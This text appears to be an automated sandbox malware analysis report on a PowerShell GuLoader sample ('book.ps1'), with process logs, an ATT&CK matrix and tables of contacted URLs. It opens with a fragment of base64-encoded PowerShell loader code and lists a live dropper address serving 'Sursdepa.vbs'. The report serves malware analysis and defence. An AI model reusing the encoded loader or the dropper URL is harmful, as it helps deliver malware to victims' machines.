EIAeQB0AHQAZQAzACAAcwBuAGsAZQByAGYAcgAgAEIAdQBuAGQAZwBhAHIAbgAgAHMAdAByAG0AawByAGUAZABzACAATAB0AG4AaQBuAGcAYgBpADUAIABpAG4AZABzACAAQQBpAHIAbABpAGYAdAA1ACAATwBDAFQAQQBWAEkATgBBAFYASQAgAFMAawBvAGsAbwBtAGkAcwBoAGIAIABVAGQAcgBlAG4AcwBuAGkAbgBnADUAIABUAGgAcgBhAHcAYwB5ACAATQBvAG4AbwBzAG8AZABpADUAIABpAG0AcABhAGwAZQBtAGUAIABJAG4AZABzAGEAdABzAGUAbgB0ADcAIABvAHIAZABlAG4AcwBtACAAIAANAAoAJABIAGUAeABhAHMAdABpAGMAaAAzAD0AMAA7AA0ACgAkAEgAZQB4AGEAcwB0AGkAYwBoADkAPQAxADAANAA4ADUANwA2ADsADQAKACQASABlAHgAYQBzAHQAaQBjAGgAOAA9AFsASABlAHgAYQBzAHQAaQBjAGgAMQBdADoAOgBWAEEAKAAtADEALABbAHIAZQBmAF0AJABIAGUAeABhAHMAdABpAGMAaAAzACwAMAAsAFsAcgBlAGYAXQAkAEgAZQB4AGEAcwB0AGkAYwBoADkALAAxADIAMgA4ADgALAJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.cmdlineJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5295.tmp" "c:\Users\user\AppData\Local\Temp\xtg032l3\CSC5582155B3987404B8B25346C869765C.TMP"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0013~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts11
    Command and Scripting Interpreter    		Path Interception11
    Process Injection    		1
    Masquerading    		OS Credential Dumping1
    Query Registry    		Remote Services1
    Archive Collected Data    		Exfiltration Over Other Network Medium1
    Encrypted Channel    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts111
    Scripting    		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts21
    Virtualization/Sandbox Evasion    		LSASS Memory1
    Security Software Discovery    		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
    Ingress Tool Transfer    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts2
    PowerShell    		Logon Script (Windows)Logon Script (Windows)11
    Process Injection    		Security Account Manager1
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
    Non-Application Layer Protocol    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
    Deobfuscate/Decode Files or Information    		NTDS21
    Virtualization/Sandbox Evasion    		Distributed Component Object ModelInput CaptureScheduled Transfer11
    Application Layer Protocol    		SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script111
    Scripting    		LSA Secrets1
    Application Window Discovery    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common1
    Obfuscated Files or Information    		Cached Domain Credentials2
    File and Directory Discovery    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync12
    System Information Discovery    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 623683 Sample: book.ps1 Startdate: 10/05/2022 Architecture: WINDOWS Score: 72 32 Antivirus detection for URL or domain 2->32 34 Yara detected GuLoader 2->34 36 Potential dropper URLs found in powershell memory 2->36 9 powershell.exe 2 28 2->9         started        process3 process4 11 wscript.exe 1 1 9->11         started        14 powershell.exe 14 17 9->14         started        17 conhost.exe 9->17         started        dnsIp5 38 Wscript starts Powershell (via cmd or directly) 11->38 40 Very long command line found 11->40 42 Encrypted powershell cmdline option found 11->42 19 powershell.exe 25 11->19         started        30 46.4.198.55, 49728, 80 HETZNER-ASDE Germany 14->30 signatures6 process7 process8 21 csc.exe 19->21         started        24 conhost.exe 19->24         started        file9 28 C:\Users\user\AppData\Local\...\xtg032l3.dll, PE32 21->28 dropped 26 cvtres.exe 21->26         started        process10

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    book.ps10%ReversingLabs

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://46.4.198.55100%Avira URL Cloudmalware
    http://46.4.198.55/10P/Sursdepa.vbsh100%Avira URL Cloudmalware
    http://46.4.198.55/10P/Sursdepa.vbs100%Avira URL Cloudmalware
    http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs100%Avira URL Cloudmalware
    http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbsPROCE~100%Avira URL Cloudmalware
    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
    https://go.microsoft.co0%URL Reputationsafe
    https://go.micro0%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs$100%Avira URL Cloudmalware
    http://46.4.198.55/10P/Sursdepa.vbs0yj100%Avira URL Cloudmalware
    http://46.4.198.55/10P/Sursdepa.v100%Avira URL Cloudmalware
    http://go.micros0%URL Reputationsafe
    http://46.4.198.55x0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://46.4.198.55/10P/Sursdepa.vbstrue
    • Avira URL Cloud: malware
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://46.4.198.55powershell.exe, 00000003.00000002.291993944.00000167E846B000.00000004.00000800.00020000.00000000.sdmptrue
    • Avira URL Cloud: malware
    		unknown
    http://46.4.198.55/10P/Sursdepa.vbshpowershell.exe, 00000003.00000002.282562516.00000167E5B18000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: malware
    		unknown
    http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.334605555.00000211C6F52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbspowershell.exe, 00000003.00000002.282555129.00000167E5B10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282734936.00000167E5D20000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbsPROCE~powershell.exe, 00000003.00000002.282784282.00000167E5E50000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://go.microsoft.copowershell.exe, 00000003.00000002.300436047.00000167FFC19000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.281286699.00000167FFC19000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://go.micropowershell.exe, 00000003.00000002.298249127.00000167E8C5F000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
